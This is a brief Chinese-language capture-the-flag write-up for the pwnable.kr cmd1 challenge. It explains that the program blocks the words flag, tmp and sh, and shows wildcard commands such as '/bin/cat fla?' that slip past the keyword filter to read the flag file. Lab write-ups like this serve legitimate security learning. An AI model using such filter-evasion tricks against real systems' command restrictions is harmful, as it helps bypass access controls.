[Toddler's Bottle]-cmd1
2018-12-04 本文已影响0人
2mpossible
- 一个可以执行cmd命令的程序,但是不能出现flag,tmp,sh的字样,这里由于调用了putenv函数,所以不能直接打命令(例如 ‘cat xxx’ 要变成 ‘/bin/cat xxx’),然后这里用通配符来读取flag
./cmd1 "/bin/cat ***"
or
./cmd1 "/bin/cat fla?"
./cmd1 "/bin/cat ***"
or
./cmd1 "/bin/cat fla?"